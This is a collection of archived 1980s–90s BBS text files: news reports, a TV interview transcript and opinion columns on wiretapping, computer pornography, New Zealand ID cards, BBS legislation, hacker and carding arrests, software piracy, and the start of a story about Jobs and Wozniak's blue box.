TK: The easier the access, the easier the abuse, and the more
difficult it is to approve that abuse. Would you agree with that,
Director?

WS: Well, the easier the access, it is still a matter of having access
under the law, under court-authorized permission, and that access,
whether it's on digital, or whether it's on, presently, analogue, that
access is what we seek to maintain.

TK: I guess what I'm saying, Judge Sessions, is that there have been
enough instances of abuse over the past 25 or 30 years that people
become concerned about making it too easy for their law enforcement
operatives.

WS: One of the things you see, Mr. Koppel, is when there is abuse or
failure to follow the techniques, it plays out in the courtroom.  You
see it in the courtroom with the testimony that goes on that stand,
under oath, that describes a failure, if there is a failure, to carry
out the procedures under Title Three.  So it's all in the court
processes.  It is not hidden. And if there is an abuse, either the
wiretap evidence would not be allowed, or it would be weakened to that
extent, or, criminal charges would be brought if there's actually
illegal conduct.

TK: Unless, of course, the wiretap evidence is used to acquire other
evidence, and the defense attorneys are not aware of the fact that the
wiretap evidence was used in the first place.

WS: Well, there's always the "Fruit of the Poisonous Tree" philosophy.
That is, if you've illegally acquired at some point, done something
illegal, it may thereafter change that, it's not acceptable....

TK: ...I understand the philosophy Judge. What I'm saying is that if
you don't know that that has happened, if you don't know that the
other information has been acquired through the wiretap, and if the
wiretap is too easily controlled by the FBI, with or without, I mean,
if you have the physical capability of doing it, do you at least
concede the potential for abuse is greater than it would have been
before?

WS: No, I really don't concede that at all, because now, if you have
endless numbers of ways that you could actually tap into the analogue,
it will be a much more secure system that you actually have, because
it will require special ways again. A special computer program that
will allow you to do that, that is designed to let you in, that is
court-authorized, court-approved, and specifically for that line,
specifically for that conversation, specifically for that purpose
and no other.

TK: All right. Closing argument again, Mr. Rotenburg.

MR: Well, it is simply the replacement of fixed walls with doors that
can be opened, and while it may be the case that some agents operating
operating with warrants will use that facility as it should be used,
it's clear the opportunities for abuse will increase. And I think all
these new problems for the Bureau as well.

TK: New problems in the sense that, when Judge Sessions says you can't
bring it to court if it hasn't been done through proper procedures,
he's quite right obviously.

MR: But it may not be the Bureau that we would be concerned about.  It
may be people acting outside of any type of authority. For the last
several years, we've seen that the telephone network is increasingly
vulnerable, and this vulnerability plays out as new weaknesses are
introduced.

WS:  Well, I'd have to interject that with the new systems, with the
new technology, it would be far more secure and far less likely that
could happen, and if it does happen, again, the recourse is the
criminal charge for the improper criminal conduct in accessing that
information.

TK: Judge Sessions. Mr. Rotenburg. Thank you both very much for being
with us.

WS: Thank you Mr. Koppel.

MR: Thank you, Mr. Koppel.

                              ** END **



From an article in the Herald, 16.8.90.


 The following text was from an article in the  
 New Zealand Herald on Thursday, August 16 1990 
 
     

------------------------------------------------------------------------------

          FORGET HOMEWORK, COMPUTER KIDS DISCOVER ELECTRO-PORN
        -======================================================-
                                           By BEN HILLS writing in the
                                           Sydney Morning Herald


It is getting on for midnight and the crack of light under young Danny's
bedroom door shows he is still up. You walk in, and there he is still
tapping away on his Amiga computer. Instead of watching television or
hanging out in the streets, he is hard at work on...

The screen blacks out, then lights up with a spreadsheet of Australian
agricultural exports. Danny swings around on his chair, his finger still on
the dump button, and gives an innocent smile:"Sorry, mum,just got carried
away with this interesting homework..."

"All right, just another 10 minutes." You shut the door, and give an
indulgent smile to your spouse. "It's just the best thing we ever bought
him."

Back in the Bedroom, young Danny reboots his system and the image he was
really interested in coalesces on the screen. It is a naked couple - the real
thing, not a line drawing or cartoon animation.

He takes his computer joystick in hand and manouvers the matching parts
into place, watching as his score clicks up for the number of
successful penetrations.

AD 2001? No way. This is just a sample - and one of the more inoffensive
samples at that - of the sort of electronic pornography that is available to
now to any half-literate home computer hacker in Sydney.
  Welcome to lovebytes - the censor's ultimate nightmare.
  Sale of X-rated videos might be banned everywhere outside the Northern
Territory and the Australian Capital Territory. Imported films without a
Censorship Board classification might be illegal. States might have
restrictions on the display of explicit material, or its sale to under-18s.

But for the cost of a local phone call, anyone with a home computer and a
modem can log into any one of hundreds of electronic bulletin boards -
preferably one which taps into an overseas network - and obtain a
memory-bank-full of material, some of which would bring a blush to the
cheek of the Marquis de Sade.

Forget about Dungeons and Dragons, Batman and Teenage Mutant Ninja
Turtles - the hottest games on the Sydney home computer hit parade this
winter have names like Party Games, McPlaymate, and Animal House.

Twenty years ago, Marshall McLuhan said television would make the world a
village. Cheap, user-friendly computers have created the global brothel.

Without much trouble, I arranged a meeting with a young man who preferred
to be known by his nom-de-modem of Crudd. I was shown a selection
which ranged from soft-core shots of Penthouse centrefolds to the latest La
Cicciolina movie (The Rise and Fallof a Roman Empress) to Animal House,
which features  various  unspeakable acts with dogs, donkeys and chickens,
to "interactive party games" in which the player(s) can compete.

Most of the material is taken from an overseas network of bulletin boards
- there is much demand for the output of military installation in the
American  Mid-West  where bored computer operators create much of the
raunchier electro-porn.

But, thanks to a $750 gadget known as a digitiser, a local cottage
industry has sprung up in do-it-yourself dirty discs.
"There's no control over it at all," says Crudd, who admits to having
embarrassed a girlfriend by using computer technology to graft her head on
to an explicit Penthouse chassis and transmit it to friends.

The technology explosion that made this possible has left regulators
floundering in its wake. Most of the state vice squads contacted had not
heard of love-bytes - or (when it was explained) did not know whether they
were breaking any law.

The first move to ban computer porn has come from a member of the ACT
Legislative Assembly, a self-styled broadminded former policecman named
Dennis Stevenson, leader (and sole member) of the Abolish Self Government
Party.

Two weeks ago he tried, and failed by one vote, to legislate to ban the
booming trade in X-rated videos in Canberra, the national capital's biggest
export industry.

Mr Stevenson says he was shocked at the material which his staff were
able to obtain with a cheap Amiga computer from bulletin boards around
Australia and overseas.
  "I have a couple of printouts on my desk right now, and even though the
quality is not that good, you can see they are explicit ... not the sort of
stuff you'd want in the hands of 14 or 15-year-olds."

He says computer pornography is worse than X-rated videos because:"The
kids don't need to use the family video. They can do it in the privacy of
their bedrooms ... anyone who knows how to use a computer and a modem can
obtain this stuff, and the parents wouldn't have a clue."

But the matter of enforcement is, understandably, vague. Police raids on
home computers? Tapping the billions of bytes that flow down the
phone-lines? Restricting PC sales to those over 18?
  "The first stept is obviously to make it illegal to sell or distribute
this material, and I intend to do this by reintroducingmy bill to ban
X-rated videos with a section including computer material. We will just
have to see where we go from there," he said.



From Computerworld, 1 April 1991.        Typed in by The Bear...
I have spoken with Randall Jackson of Computerworld's Wellington office, 
this story is NOT a hoax.

PM'S TEAM GETS SET TO MOVE ON ID CARDS

by Clive Mathew-Wilson

The Government plans to introduce a National Identity Number scheme for
all New Zealanders by the end of next year, Computerworld sources say.

The numbering system is likely to involve the use of a "smart" ID card.

A team working on the project with the Prime Minister's office has yet
to announce its findings to Parliament, but it is understood it is the
format of the ID scheme, not the scheme itself, that is being debated.

Usually reliable sources within Parliament suggest the ID scheme -
originally proposed by the International Monetary Fund - was already
part of Treasury's economic reform plans before the election, and that
it is being implemented virtually without change by the new Government.

The first stage of implementation - data sharing between the Social
Welfare department and the IRD - is expected to take place shortly.

It is understood that in place of any new common identity numbering
scheme, the issuing and control of IRD numbers will be tightened, and an
IRD number used in all relevant transactions throughout various
government departments.

More than 1.7 million ID numbers are currently allocated to wage and
salary earners, and recent changes to tax laws require every bank
account to be tagged with an IRD number by 1992.

This would, in effect, give every New Zealander a unique, computerised
serial number.

It is believed the only real problems facing the ID card scheme are
those of computer power.

Doubts have been raised over the ability of existing systems to cope
with the information-handling and storage needs of a National ID Card.

The most likely scenario at present, entails a gradual phasing-in of
both the card and the information-matching based around it, starting
with data-matching between the huge Social Welfare and IRD computer
systems, which operate out of the same GCS installation at Trentham.

One key target of the ID card is understood to be the public health
system. The computerised "smart" card, with its instant reference to a
person's income details, is to be used to target healthcare as the
public health system is wound down.

If Computerworld's source is correct, a number of politicians and civil
servants appear to have been economical with the truth.

Prime Minister Jim Bolger, while he was in opposition, undertook not to
introduce a common identification number system, despite a confirmation
by the IRD at the time that the IRD number was, in fact, such a system
already.

Similarly, shortly before the elections last year Inland Revenue
Commissioner Dave Henry denied the IRD had plans to link its computer
systems with those of Customs, Births, Deaths and Marriages, Social
Welfare, Housing Corporation and ACC. Shortly after the election, plans
to link the Social Welfare and IRD computers were announced.

The Australian Government, which failed dismally in its plans to launch
a national ID card, is understood to be watching the New Zealand
experiment with interest, pending a possible re-introduction of the
scheme in Australia in a somewhat different form.

Civil liberties spokesperson Barry Wilson attacks what he terms a
"conspiracy of silence" over the issue.

"When has there been any informed public debate over whether New
Zealanders need or want ID cards? The public, by and large, has been
completely ignored," he says.

"New Zealanders voted against the ID card scheme when they dumped
Labour."

Computerworld sought ministerial and IRD response on the issues, but
neither had answered our calls by press time.
EOF

                                KIWICARD AND YOU 
                                ----------------
    
                         New Zealand Privacy Foundation
                                  PO BOX 3385
                                  AUCKLAND, NZ

                    Phone (011649) 298-8651, (011649) 674-429

                         MEMBERSHIP $10 WAGED, $5 UNWAGED


KIWICARD AND YOU...

In a pre-election speech Ruth Richardson said, "ID cards have got 
all the trappings of Big Brother - I am a freedom loving New 
Zealander."  Jim Bolger said "National absolutely rejected any 
proposal for a common numbering system between the two departments 
[Inland Revenue and Social Welfare] or for identity cards."

BROKEN PROMISES!

Soon the data matching between these departments is to commence, and 
the first Kiwicards, or Community Services Cards, as we are supposed 
to call them, are to be sent to beneficiaries.

THE GOVERNMENT TELLS US THE CARDS ARE VOLUNTARY, yet they are 
automatically to be sent out to beneficiaries and pensioners.  They 
are needed to obtain free or subsidised health care and many 
families are so hard pressed by job losses and benefit cuts that the 
card will be a necessity.  Each card has the CARDHOLDER'S NAME AND 
IDENTIFICATION NUMBER.  So much for that promise.

THE CARDS HAVE A MAGNETIC STRIPE which Mrs Shipley states is never 
to be read by a machine.  If that is the case, why is it on the card?

THEY ESTABLISH ENTITLEMENT TO SUBSIDISED HEALTH CARE BUT ARE NOT 
SUFFICIENTLY SOPHISTICATED TO DO THIS ON THEIR OWN.  The Minister of 
Health has said that "up to five cards may be involved."  The 
obvious next step is to make the card "smart".  How long do you 
think it will take for the Government to break its promise not to 
make it a "smart" card?  Maybe they will keep that promise and give 
the "smart" card another name.  "Dumb" or "smart", and whatever it 
is called, the Kiwicard still stinks.


QUESTIONS WE NEED TO ASK

- Why are new cards being devised for health care when we already 
  have adequate existing systems?

- Why was the legislation for the Kiwicard rushed through without 
  consultation with the public or a Parliamentary Select Committee 
  hearing?

- Why are enormous amounts of money being spent on computer system 
  when these funds could be targeted to health care users?

- If the Kiwicard is not to be extended to other fields, why is the 
  legislation authorising it worded to allow much more extensive use?

- Why are there no safeguards against the misuse of the card by 
  Government agencies, such as the police, or by private enterprise?

- There has been no formal cost-benefit analysis to assess a need 
  for data matching.  It is likely to cost well in excess of half a 
  billion dollars and will bring unproven and unknown financial 
  return.  How can this sort of expense be justified?

- Although the card has been presented as a health entitlement card 
  for low income earners, it has been stated to be inadequate for 
  the task.  A member of the Government "Change Team" told TV3 that 
  a "smart" national ID card is being planned for all New 
  Zealanders.  The New Zealand Privacy Foundation believes that the 
  Kiwicard is the thin end of the wedge, paving the way for the 
  "smart" card.


AIM AND OBJECTIVES OF THE NEW ZEALND PRIVACY FOUNDATION

- To act as a watchdog on privacy issues.

- To put a stop to the Kiwicard (now known as Community Services 
  Card) and related erosions of personal privacy, including 
  information swapping between Government departments and proposals 
  to introduce "unique personal identifiers."

- To oppose the development of surveillance systems that intrude 
  upon the rights and privacy of the indiviual, especially systems 
  of data matching, identification cards and unique numbering 
  systems.

- To campaign and lobby for the protection of the individual against 
  privacy intrusion.

- To educate New Zealanders and increase public awareness in 
  relation to the right of personal privacy and privacy issues.

- To conduct research into privacy related issues and technologies.


JOIN THE NEW ZEALAND PRIVACY FOUNDATION:
 
Send to : The Trustees
          NEW ZEALAND PRIVACY FOUNDATION
          PO BOX 3385
          AUCKLAND

CONTACT PHONE NUMBERS : (09) 298-8651, (09) 674-429


...............................................................................

MEMBERSHIP FORM

Please enrol me as a member of the New Zealand Privacy Foundation.


Name    ..........................................................


Address ..........................................................
        
        ..........................................................

        ..........................................................


Phone   ...................................


I enclose $ .......................... annual membership/donation

                 (MEMBERSHIP $10 WAGED, $5 UNWAGED)




	      **** PROCESSED THOUGHTS ****

		   By John C. Dvorak

      PARANOIA RUNS RAMPANT THROUGH COMPUTER COMMUNITY

   As I was perusing the various information services I ran into a notice that
the State of California is working on legislation to intimidate operators of
on-line bulletin board systems.  As usual the BBS systems operators (SYSOPS)
are panicking over this effort.  In the end they will somehow blow it for
themselves and all of us.

   The case is Senate bill SB 1012 introduced by some guy from Citrus Heights
named John Doolittle, a Republican.  I don't know and I don't care whether this
guy knows anything about computers.  If he knew anything, he would be the only
one in the legislature who did.  This is a plus, and few of the computer users
realize this.  Not only because (when it comes to technology) these guys
promote dumb legislation, but because the legislation is so dumb that it
hampers any possible enforcement.

   SB 1012 is a perfect example.  People should not panic, they should applaud.
Listen to the way the law is written.  Here's the parts that computer users are
moaning and groaning about:

   "Section (e) (1).  Any person who knowingly places a telephone number or
address not listed, personal identification number (PIN), computer password or
access code, credit card number, debit card number, bank account number, or
other personal or private information of another on a computer bulletin board
or otherwise makes the information available electronically to the public
without the prior written authorization by the owner of the information is
guilty of a public offense.

   (2) Any owner or operator of a computer bulletin board who knowingly permits
the maintenance of a telephone number or address not listed, personal
identification number (PIN), computer password or access code, credit card
number, debit card number, bank account number, or other personal or private
information of another on a computer bulletin board or otherwise makes the
information available electronically to the public once having been notified
that it is private or personal information is guilty of a public offense."

   The key word here is "knowing".  It is nearly impossible to prove a
"knowingly" offense unless the guy proclaims it on the bulletin board.  Ask a
lawyer.  This is a creampuff law, but the antsy SYSOPS and paranoids in the
audience are going to moan and groan and the result will be a change from
"knowingly" to "negligently." The negligence concept is more open to debate and
enforcement abuse.

   Then they'll moan and groan because of the dubious definition of negligence
and they end up with a law that leaves out both words.	That means if something
gets posted then you're guilty, period.

   The BBS SYSOPS simply have not been able to self- police.  Meanwhile the BBS
movement is big-time.  Anyone with half a brain knows that this means
legislation of some sort to regulate these guys.  It's a simple fact of life in
this country that we are governed by lots of laws designed by lots of lawyers.
Let's work from that premise.

   Let's just resign ourselves to the fact that legislation of one form or
another is coming.  There is simply no way that it won't.  If you think it can
be prevented, then you're an idealist doomed to bitter disappointment.  The key
to success is to get the legislation in early and with no teeth.  SB 1012 is
perfect and it can be later pointed to as "just fine" if someone really wants
to crack down.	"Hey, since SB 1012, the problems have disappeared.  Everything
is hunky- dory." The longer we wait the worse it will be -- just like going to
the dentist.  And specious arguments like, "Golly, supermarket bulletin boards
aren't regulated!" will just make things worse.  For one thing only an idiot
would compare the two.	Show me how to download a Safeway bulletin board in San
Francisco from my office in Kansas City!

   I know my position on this issue is unpopular, but it is far more realistic
than the crybaby complaining I keep hearing and reading from panicky BBS
operators who are unlikely to ever be affected by any of these laws.

     -------------------------------------------------
   Reprinted with the kind permission of the author and publisher from Computer
Currents 5/7/85 pg.6.  This and other information related to SB1012 is
available at Etcetera!, fido 423 in San Jose, CA at 408-978-3282 300/1200.

                    PORTUGUESE PIRATES BUSTED BY POLICE



 Two young guys were busted last friday by the portuguese police.

 The investigation ended after a week. The police done domiciliary inves-
tigations in four houses and informatic material was captured by them, that
the experts investigated.

 The two  guys  are acused of  carding, entering in a european network,
and capturing credit cards and then, and magnetizing the credit cards,
with one machine that they carded from the usa. The method they used was
deleting their credit cards and introducing the victims informations, that
they got from the european networks.

 The phraud was discovered in the initial phase when a envolved 10/20 of
citizens that noticed strange debits in their bancary accounts.

 Those young guys were the first to be busted by carding in Portugal.

 They are acused too of steel and then sell confidential information.

 The informatic 'experts' of the police investigated the computers, but
those guys teached them how to use their engine, and maybe something else.

 The police says that millions of escudos were phrauded.

                        Signed: Dr.Kaos & Traderfox

 PS: This text is true, you can consult Diario De Noticias of 14th of July.



Printed in Popular Communications November 1992 issue.
Page 4 
By Tom Kneitel, K2AES


You say that someone overheard your cordless telephone and
learned your bank account number?  Ho boy!

You claim that despite a federal privacy law your cellular
phone was monitored but someone who told your boss you said he
was  a skinflint?  Whoa, but who cares?

You tell me that some 16 year old got your company computer's
security password from a BBS, then used it to open a $5000
credit line charge account for himself?  Hey, I'm all choked up.

Every couple of years a few computer hackers get caught and
are written up in the newspapers.  That triggers yet another round
of astonished revelations on the tabloid TV shows. the indignant
show hosts act mortified at learning some of the computer files
that hackers have been able to invade.  This invariably includes
financial and educational records, court
and police information, scientific data, and national defense
data.

This ritual of hacker discovery takes place regularly every
two or three years.  Each time it's as if none of these
practices had ever before been made known to the public.
We are asked to have limitless pity for those poor owners of
those computers whose private and sacred data has been
ruthlessly  violated at the hands of marauding cyberpunks
with their evil computers.

Another round of this drivel appears to be in progress now.  I
recently saw a replay of the entire scenario right down to
Geraldo Rivera on TV discussing computer hackers.  With a face
of stony seriousness, it was as if he had personally
discovered the first young hacker ever captured alive and
forced to confess his many sins in front of a TV camera.
Personally, I thought the hacker came across a lot better than
did Geraldo.

Despite this continuing negative public relations campaign to keep
the world living in dread fear of hackers, I'm still not
sold on the need to immediately sign up for the tar and
feather brigade.  In fact, methinks I smell a red herring.
I'm beginning to suspect that all of this medial coverage
consists of nothing mote than the chintziest possible way of
finding convenient scapegoats to blame for the failure of the
nation's data security systems.

Somewhere along the line someone forgot that it's the
responsibility of those wanting security to sufficiently
upgrade their own technology to the point where it works.  The
Primary responsibility for providing computer security can't
be relegated to third parties on the basis of expecting they
will offer security simply by ignoring the tempting and easily
accessible data because they are told it's "illegal" to
access, and because they should realize that it's not nice to
snoop.

That logic doesn't wash.  That system of security can't work.
Why should it work for those seeking security for their
computerized data?

In the July '92 issue of U.S. Naval Institute Proceedings,
there was a feature on C4I by Robert David Steele, Assistant
Chief of Staff (in charge of C4I- command , control,
communications, computer, and intelligence) at Headquarters,
U.S. Marine Corps.  He stated "The inherent danger in a
necessary but risky strategy of reliance on commercial
communications and computer equipment-to transmit much of our
operational logistics, personnel, and even intelligence
information. around the globe- exacerbates the targeting-data
and mapping shortfalls.  The Marine Corps is off the limb and
out in free fall when it comes to vulnerability to our C4I
links...Our reliance on commercial satellites and ground
switching stations leaves us wide open to total shutdown of
our communications, and complete penetration of our
administrative and logistics computer systems by any skilled
hacker."  He noted that this was the weakest and most
neglected, C4I link in the Marine Corps.

The man spelled it out very well.  If commercial
telecommunications landlines, satellites and other facilities
are to be relied upon, then they can be penetrated by skilled
hackers.

And have you noticed that the majority of skilled hackers you
learn about from the media are young adults or even teen age
hobbyists using home computers?  Some of these hackers are
benign  and merely curious, others just like the challenge of
seeing how many systems they can invade.  Sure, there are also
pranksters, plus a sprinkling of those who are truly
malicious.  The media seldom mentions the really dangerous
professional computer security violators-those involved in
industrial espionage , or who work for foreign governments,
international drug cartels, terrorist groups, and organized
crime.  Nevertheless, benign or malevolent, hobbyist or
professional, all who snoop through presumed secure computers
have the potential to steal, modify, or destroy all kinds of
data.  That this can still so easily be accomplished seems rather
astonishing at this point.

Underground BBS's offering information on these techniques are
popular and known to all who wish to seek out the information.

The data in the computers that hackers are accused of
accessing is just sitting there.  It's tempting, tantalizing,
juicy, ripe and practically crying out to be called up.  To
some amateurs and computer hobbyists, this is what amounts
to an "attractive nuisance", similar to a swimming pool of a
high tension electric tower.  Attractive nuisances are
potentially dangerous, but desirable and easily accessible
things that require a fence or other security measures, lest
the owner be declared negligent.  Every individual, industry,
and government entity is responsible when they create and
maintain an attractive nuisance.  They can post all of the "No
Trespassing" signs they want, but they still must have
safeguards such as fences.  If their safeguards are violated,
the owner of the attractive nuisance can still be considered
to have been less than diligent in keeping out intruders.  The
intruder may be only minimally held responsible for getting
through.

Somehow, though, the communications industry is unique in that
it gets off the hook with being responsible for its many
attractive nuisances.  A "No Trespassing" sign is hung up, and
intruders are considered to be in the wrong after that.

Common sense dictates that those wanting or needing real
security have no right to fall back upon low tech public
access telecommunications systems, then cry "foul" when the
security systems don't work for them.  This includes all
categories of governmental users, including the military.
Maybe they'll have to hang up and use circuits closed to the
public.

Those business firms, universities, government entities, and
others who demand tight security but need to or elect to
remain connected to the public access telecommunications
system are going to have to get better security advice, and
more efficient programs.  Don't want to?  Then they can and
will continue to have their data exploited by outsiders.  They
must tolerate it without complaining.

It's hard for me to have very much pity for multi-million
dollar companies, or the federal government when I hear about
their broached computer security.  Not when I learn that it
can be zapped by a hobbyist with a personal computer and a
program that was downloaded from a BBS.  I don't quite go so
far as those hackers who claim that they're performing a
public service by pointing out the security loopholes in
computer security systems.  The main service they are
performing is in embarrassing those folks in charge of
computer security.  This is a service that is hardly
appreciated, and is undoubtedly what has sparked their
hilarious and hysterical media diversionary blitz and
smokescreen on the evils of hackers

My own policy on cellular and other comms has been that if you
want privacy, it's solely your responsibility to assure that
you take whatever steps are required to cause your system to
be secure from outside interception.  The responsibility can't
be effectively dumped onto third parties either by
legislation or by appeals to public ethics and good-will.  So
let it also be with the data stored in computers.

I'm not an advocate for computer hackers, or for hacking-
quite obviously some of it has resulted in damage to and theft
of data.  But let's be at least a little fair bout this
ridiculous media overkill relating to amateur hackers.  How
about sharing some of the blame by shifting the complete focus
off the hackers?  Let's also see groups of these inept and
impotent computer security experts dragged out in front of the
tabloid TV cameras to own up to the public about their total
inability to protect data about you and I, and on national
defense, stored in and exchanged between public access
computers.

How about asking financial institutions, business, and
governmental agencies to explain why the data they are
supposed to be holding in trust?  And, forgetting about the
hobbyists, let them admit to the potential threat to their
stored data from terrorist groups, foreign governments,
organized crime, and other high powered professional operations.
Nobody wants to talk about any of these things.  If the public
ever learned the real threats to stored data, they would no
longer be too worried about amateur and hobbyist hackers.

Hobbyist hackers have been around for more than a decade.
It's really time now to stop the crocodile tears for the
government and big companies that get their data rifled by an
image of *Billy Whizbang* and his souped up *Commodore 64*.
If companies and agencies are so stupid and lazy that they
still can't protect important and vital data, then what they
deserve is our anger and derision, not public pity.  The
public, in turn, needs some real answers instead a of a lot of
garbage blaming it all on teenage hackers.

Fifty years ago, young people reacted to attractive nuisances
by swimming in a neighbors's pool while the people were on
vacation.  Or they stole the bell from the town church.
Today, maybe they are into computer hacking instead.  These
are bright and creative people-let's not forget that.  One the
one hand, people complain young people wrecking their brains
on drugs and loud rock music.  Hobbyist hackers are young
people who aren't spending money on drugs and rock CD's
(typist's note...I have a LOT of rock CD's).  Take your choice.

We aren't condoning computer hacking.  Certainly the practice
must be monitored and discouraged until the computer industry
can find some people intelligent enough to devise valid
security systems.  But we should be mindful that in a few
years, these young hackers are the bright people who will be
on the cutting edge of developing future technologies.
Instead of getting bent all out of shape about their
undirected curiosity, let's think about trying to channel
their talents and interests into more constructive
directions!  In all fairness, we can't allow the inept
computer  security industry make them sound too evil when,
after all, hackers are (at worst) no more than a small part of
the computer security problem. 
 
Retyped for your pleasure by BMO (scanners?  BAH!)


MISSOURI MAN PLEADS NOT GUILTY TO
CHARGES OF CRACKING 911 SYSTEM

  (Feb. 17)
  A 19-year-old University of Missouri
has pleaded not guilty to federal
charges he invaded the 911 emergency
phone network for nine states, then
passed along stolen information in an
electronic publication.
  Craig Neidorf was indicted earlier
this month along with Robert J. Riggs,
20, of Decatur, Ga. They are charged
with interstate transportation of stolen
property, wire fraud and violations of
the federal Computer Fraud and Abuse Act
of 1986.
  As reported earlier, prosecutors
allege the two used computers to enter
the 911 system of Atlanta's Bell South
and copied the program that controls and
maintains the system. The stolen
material then allegedly was published on
a computer bulletin board system
operating in the Chicago suburb of
Lockport. Authorities contend Neidorf
edited the data for an electronic
publication known as "Phrack."
  Associated Press writer Sarah Nordgren
reports that at a hearing Thursday,
assistant US Attorney William Cook was
granted a motion to prevent the 911
program from becoming part of the public
record during the trial. US District
Judge Nicholas Bua set April 16 as the
trial date.
  The 911 system in question controls
emergency calls to police, fire,
ambulance and emergency services in
cities in Alabama, Mississippi, Georgia,
Tennessee, Kentucky, Louisiana, North
Carolina, South Carolina and Florida.

Downloaded From P-80 Systems 304-744-2253
		      THE SOUTH POLE..........[312] 677-7140
		      :::::::::::::::::::::::::::::::::::::::
			       -DATELINE MAY 14, 1983
			       -FOR IMMEDIATE RELEASE

			  "PUBLISHER PIRATES PUBLISHER?"
		      :::::::::::::::::::::::::::::::::::::::


   AVANT-GARDE, THE EUGENE, OREGON-BASED PUBLISHER OF SOMETIMES OFFBEAT APPLE
SOFTWARE, WAS EMBARRASSED RECENTLY BY THE DISCOVERY THAT THEIR MOST RECENT
CREATION, "TRIPLE ARCADE INSANITY", CONTAINS CLEAR EVIDENCE THAT THE PROGRAMS
WERE WRITTEN USING PIRATED SOFTWARE.  THE DISK CONSISTS OF THREE ARCADE-STYLE
GAMES WRITTEN WITH A COPYRIGHTED GAME-WRITING UTILITY PROGRAM CALLED "THE
ARCADE MACHINE" FROM BR0DERBUND SOFTWARE INC, OF SAN RAFAEL, CALIFORNIA.
ALTHOUGH AVANT-GARDE'S PRODUCT PACKAGING STATES THAT THE PROGRAMS WERE DESIGNED
USING BR0DERBUND'S UTILITY, EACH OF THE THREE GAMES CONTAINS A MENU WHICH IS
PART OF AN ALTERED VERSION WIDELY CIRCULATED AMONG APPLE "PIRATES".

   THE UTILITY'S NORMAL MENU CONTAINS EIGHT OPERATIONS TO BE PERFORMED ON THE
GAME UNDER DEVELOPMENT.  APPARENTLY DISSATISFIED WITH THE RESTRICTED MENU,
WHICH ALLOWS THE GAME TO BE SAVED ONLY ON A DISK WITH A COPY-PROTECTED FORMAT,
A WELL-KNOWN EXPERT IN SOFTWARE "UNPROTECTION" (OR "KRACKIST", AS THEY PREFER
TO BE CALLED) MADE SUBSTANTIAL ALTERATIONS TO THE PROGRAM.  NOT ONLY WAS THE
COPY PROTECTION REMOVED FROM THE DISK, BUT A NINTH MENU ENTRY WAS ADDED WHICH
ALLOWS THE DEVELOPED GAME TO BE STORED AS AN APPLE DOS BINARY FILE ON A
NORMALLY-FORMATTED DISK.

   WHAT THE GAMES' AUTHOR, BRAD POSEN, APPARENTLY DID NOT KNOW WAS THAT WHEN A
GAME IS STORED, OR "SAVED", WITH THE ADDED FEATURE, THE INCRIMINATING
NINE-CHOICE MENU IS SAVED WITH IT.  THUS, EACH COPY OF THE DISK DISTRIBUTED BY
AVANT-GARDE ADVERTISES THE ILLICIT SOURCE OF ITS GENERATION.  PROBABLY EQUALLY
EMBARRASSING IS THE PRESENCE OF AN APPLE II "SCREEN" IN ONE OF THE PROGRAMS
WHICH CONTAINS A CATALOG LISTING OF SEVERAL "BROKEN" AND PIRATED APPLE PROGRAMS
SUCH AS GEBELLI SOFTWARE'S "HORIZON V", SIERRA ON-LINE'S "CANNONBALL BLITZ",
AMONG OTHERS.

   IT WOULD APPEAR THAT AVANT-GARDE, IN A RUSH TO CASH IN ON SOME RELATIVELY
UNIMAGINATIVE ARCADE GAMES, COPIED AND DISTRIBUTED THE ENTIRE DISK SUBMITTED BY
WHAT MUST BE A YOUNG, NAIVE AUTHOR.  IN SO DOING, THEY HAVE INADVERTANTLY
EXPOSED AN AMUSING IRONY--ONE PUBLISHER GAINING VIA THE ILLEGAL USE OF ANOTHER
PUBLISHER'S COPYRIGHTED PRODUCT.  IT IS WIDELY KNOWN BY MAJOR SOFTWARE
PUBLISHERS THAT PIRATED COPIES OF SUCH DEVELOPMENT UTILITIES ARE WIDELY
DISTRIBUTED, AND PROBABLY FREQUENTLY USED FOR THE GENERATION OF COMMERCIAL
SOFTWARE, BUT THIS EPISODE MARKS THE FIRST PUBLIC CONFIRMATION OF THE FACT.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
File: MERRY PRANKSTERS-WOZNIAK&JOBS
 Read 11 times

 -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-
 -			       MERRY  PRANKSTERS			     -
 =			 InfoWorld -- October 1, 1984			     =
 -		    By Allan Lundell & Geneen Marie Haugen		     -
 =		   Word Processed for SF][ by BIOC Agent 003		     =
 -=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-=*=-

	    -------------------------------------------------------
	    Jobs and Wozniak unearth the secrets of phone phreaking
	    -------------------------------------------------------

   The year was 1971.  Two silent figures were observing the entrances to SLAC,
the complex that housed the Stanford Linear Accelerator.  With one of the
newest, shiniest atom smashers in the world, the SLAC facility at Stanford
University was a physicist's dream -- a center for investigation into the most
basic elements of reality.

   But the two observers were not interested in the nature of reality.	Racing
to a side entrance, they snuck past the SLAC security patrols and entered the
high-technology library.  They knew their way around, having visited the SLAC
facility several times before.	It was always exciting to break in; there was
no limit to the information they could absorb.

   This time, however, they were on a specific mission.  Thumbing through a
document on multifrequency telecommunications systems, Steve Wozniak whispered
to his friend, Steve Jobs.

   "This is it!  This matches the frequencies in Esquire exactly!  With this
information, we can build one!"

   The future creators of the Apple II computer pulled out their pens and
notebooks, scribbling data almost faster than a high-speed line printer.  This
was no minor treasure.	They had unearthed some of the secrets of the little
blue box, topic of the infamous Esquire article on phone phreaks by Ron
Rosenbaum.  [Esquire article on-line -- parts I - VI - SF Phreak L2 (9)]

   The blue box was the magical device needed to enter and exercise control
over the world's phone system -- the world's electronic nervous system.  And
now the two Steves had the access codes.

   Days of intensive effort followed, until they held their first model, with
wires and coils spilling out, to the phone and punched the secret codes.  After
many exasperating failures, the phone rang a long-distance number.  Someone
answered....

   Jobs yelled out to the person on the line:  "Hello!  We've got a blue box,
and we are calling you from California!  Where are you located?"

   A little confused, their first planetary contact yelled back:  "I'm in Los
Angeles!"

   The boys needed help.  Now that they knew the Esquire story was truth and
not fiction, they imagined its hero, Cap'n Crunch, must be real, too.  The two
Steves put out the word through the underground that they wanted to meet him.

   It was some meeting.  The infamous Cap'n had named himself after Cap'n
